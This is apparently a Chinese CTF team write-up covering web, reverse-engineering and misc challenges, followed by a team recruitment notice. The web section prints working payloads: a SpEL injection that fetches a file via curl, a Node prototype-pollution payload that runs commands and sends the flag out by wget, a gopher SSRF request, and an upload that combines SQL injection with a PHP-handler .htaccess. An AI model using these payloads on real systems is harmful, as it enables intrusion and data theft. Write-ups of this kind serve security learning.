Web
ez_java
package me.su;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import java.io.IOException;
import java.util.regex.Pattern;
public class demo {
public static void main(String[] args) {
String name = "#{new ProcessBuilder(new String[]{\"curl\",\"-o\",\"/tmp/1\",\"vps:901\"}).start()}";
if (blackMatch(name)) {
System.out.println("die");
return;
}
System.out.println(name);
System.out.println(getAdvanceValue(name));
}
public static String getAdvanceValue(String val) {
return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
}
private static boolean blackMatch(String val) {
for (String keyword : getBlacklist()) {
if (Pattern.compile(keyword, 34).matcher(val).find()) {
return true;
}
}
return false;
}
private static String[] getBlacklist() {
return new String[]{"java.+lang", "Runtime", "exec.*\\("};
}
}
ezjs
原题,来自https://www.anquanke.com/post/id/248170#h3-7
跟原题相比只是增加了一个黑名单过滤,测试发现过滤了return、execSync、flag、sh、rm等等,其中return被过滤所以本题没办法直接回显了,因此本题变成一个无回显情况下的命令执行
最终使用如下payload利用wget外带拿到flag:
flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}
{"__proto__":{"sourceURL":"\u000aglobal.process.mainModule.constructor._load('child_process')['execSyn\\x63']('busybox\\x20\\x77get\\x20ip:port/`tac\\x20/.\\x66lag|base64`')//"}}
Sign_in
http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41
import urllib.parse
test =\
"""POST /?a=1 HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Referer: bolean.club
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
b=1
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')
result = '_'+new
print(result)
upload
POST / HTTP/1.1
Host:
124.220.9.19:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1470817923043980331208184612
Content-Length: 391
Origin:
http://124.220.9.19:8001
Connection: close
Referer:
http://124.220.9.19:8001/
Upgrade-Insecure-Requests: 1
- ----------------------------1470817923043980331208184612
Content-Disposition: form-data; name="upfile"; filename="1a' or updatexml(1,concat(0x7e,(select substr(flag,16,32) from flag)),0) or'"
Content-Type: ctf
<FilesMatch "1.gif">
SetHandler application/x-httpd-php
AddHandler php5-script .gif
</FilesMatch>
- ----------------------------1470817923043980331208184612--
Re
ez_algorithm
繁琐的一些移位,置换加密
char *__fastcall encryption(char *a1)
{
int v1; // eax
char v2; // al
char v3; // al
__int64 v4; // kr00_8
char v5; // al
char v6; // al
int v7; // eax
char v8; // al
char v9; // al
char v10; // al
char v11; // al
char v12; // al
char v14[1012]; // [rsp+20h] [rbp-60h] BYREF
int v15; // [rsp+414h] [rbp+394h]
const char *v16; // [rsp+418h] [rbp+398h]
const char *small; // [rsp+420h] [rbp+3A0h]
int v18; // [rsp+42Ch] [rbp+3ACh]
char *v19; // [rsp+430h] [rbp+3B0h]
char *v20; // [rsp+438h] [rbp+3B8h]
small = xyp2();
v16 = xyp3();
v20 = v14;
v19 = a1;
v18 = 0;
v15 = 1;
while ( v18 < strlen(a1) )
{
if ( *v19 <= 64 || *v19 > 90 )
{
if ( *v19 <= 96 || *v19 > 122 )
{
if ( *v19 == '_' )
{
switch ( v15 + rand() % 7 )
{
case 0:
*v20 = ':';
break;
case 1:
*v20 = '&';
break;
case 2:
*v20 = '+';
break;
case 3:
*v20 = '*';
break;
case 4:
*v20 = '\\\\';
break;
case 5:
*v20 = '?';
break;
case 6:
*v20 = '$';
break;
case 7:
*v20 = '#';
break;
default:
break;
}
}
else if ( *v19 <= 47 || *v19 > 57 )
{
*v20 = *v19;
}
else
{
v12 = encryption2(*v19);
*v20 = v12;
}
}
else // 小写字母
{
v7 = v18 % 4;
if ( v18 % 4 == 1 )
{
v9 = encryption2(small[(*v19 - 97) * (v18 % 4)]);
*v20 = v9;
}
else if ( v7 > 1 )
{
if ( v7 == 2 )
{
v10 = encryption2(small[(*v19 - 97) ^ (v18 % 4)]);
*v20 = v10;
}
else if ( v7 == 3 )
{
v11 = encryption2(small[*v19 - 97 + v18 % 4]);
*v20 = v11;
}
}
else if ( !v7 )
{
v8 = encryption2(small[*v19 - 97 - v18 % 4]);
*v20 = v8;
}
}
}
else // 大写字母
{
v1 = v18 % 4;
if ( v18 % 4 == 1 )
{
v3 = encryption2(v16[*v19 - 65 + v18 % 4]);
*v20 = v3;
}
else if ( v1 > 1 )
{
if ( v1 == 2 )
{
v4 = v18 * (*v19 - 65);
v5 = encryption2(v16[(((HIDWORD(v4) >> 30) + (unsigned __int8)v18 * (*v19 - 65)) & 3) - (HIDWORD(v4) >> 30)]);
*v20 = v5;
}
else if ( v1 == 3 )
{
v6 = encryption2(v16[(*v19 - 65) ^ (v18 % 4)]);
*v20 = v6;
}
}
else if ( !v1 )
{
v2 = encryption2(v16[*v19 - 65 - v18 % 4]);
*v20 = v2;
}
}
++v18;
++v19;
++v20;
}
return v14;
}
我们根据程序对数字,大写字母,小写字母的不同处理来写处解密脚本:
s = list(b"WQUTYBXDOFVRKHCGSMLJAZENIP")
t = list(b"gskfcqtioutrvenjwlpmadybhx")
enc = "BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
"BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
enc = list(enc.encode())
for i in range(28):
if enc[i] >= 65 and enc[i] <= 90:
index = s.index(enc[i])
if i%4 == 0:
tmp = index+97
elif i%4 == 1:
tmp = index+97
elif i%4 == 2:
tmp = (index^2)+97
else:
tmp = (index-3)+97
enc[i] = tmp
elif enc[i] >= 97 and enc[i] <= 122:
index = t.index(enc[i])
if i%4 == 0:
tmp = index+65
elif i%4 == 1:
tmp = (index-1)+65
elif i%4 == 2:
tmp = (index^2)+65
else:
tmp = (index^3)+65
enc[i] = tmp
elif enc[i] >= 48 and enc[i] <= 57:
tmp = 105-enc[i]
enc[i] = tmp
print(bytes(enc))
#flag{w3Lc0mE#t0+3NcrYPti0N:}
最后这个是多解的,根据flag表示的意思,推出有 _ 进行连接。
组合得到flag
flag{w3Lc0mE_t0_3NcrYPti0N:}
定时启动
修改系统时间在2022-04-24 09:09:09附近,不断运行squid程序,且运行后删除在当前目录生成的Readme.txt(因为测试出程序是通过判断当前目录下有无Readme.txt来判断程序是不是第二次运行)
多次尝试得到flag
Re_function
在压缩包的注释信息中有一段数据,复制下来发现是一张图片,从图片最后看见一个base编码,解码即是压缩包密码。
第一个程序是加密程序
解密得到:SqcTSxCxSAwHGm/JvxQrvxiNjR9=
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> s = [s[i]^0x37 for i in range(0, 28, 2)]
>>> s
[83, 99, 83, 67, 83, 119, 71, 47, 118, 81, 118, 105, 106, 57]
>>> bytes(s)
b'ScSCSwG/vQvij9'
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> for i in range(28):
... if i%2 == 0:
... s[i] ^= 0x37
...
>>> s
[83, 113, 99, 84, 83, 120, 67, 120, 83, 65, 119, 72, 71, 109, 47, 74, 118, 120, 81, 114, 118, 120, 105, 78, 106, 82, 57, 61]
>>> bytes(s)
b'SqcTSxCxSAwHGm/JvxQrvxiNjR9='
然后第二个程序是一个变表base64解码,把第一个程序解出的数据进行一个变表base64解码就是flag。
freestyle
逆向fun1 与fun2得到两次输入要满足以下条件fun1:( 4 * (3 * atoi(s) / 9 - 9) != 4400 )fun2:( 2 * (atoi(s) % 56) != 98 )并且题目提示需要求出MD5值写出脚本 得到key。
key1=(4400/4+9)*3
key2=(98/2)+n*56
key=str(key1)[:-2]+str(key2)[:-2]
MD5:
import hashlib
def getmd5(str):
m = hashlib.md5()
m.update(str.encode("utf-8"))
return m.hexdigest()
for i in range (1,8):
key1=(4400/4+9)*3
key2=(98/2)+i*56
print(key1)
print(key2)
flag=''
key=str(key1)[:-2]+str(key2)[:-2]
print(getmd5(key))
Misc
easyiec
拿到流量包,直接strings:strings
./easyiec/easyiec.pcap |grep 'flag’得到flagflag{e45y_1eci04}
Tip
你是否想要加入一个安全团
拥有更好的学习氛围?
那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)
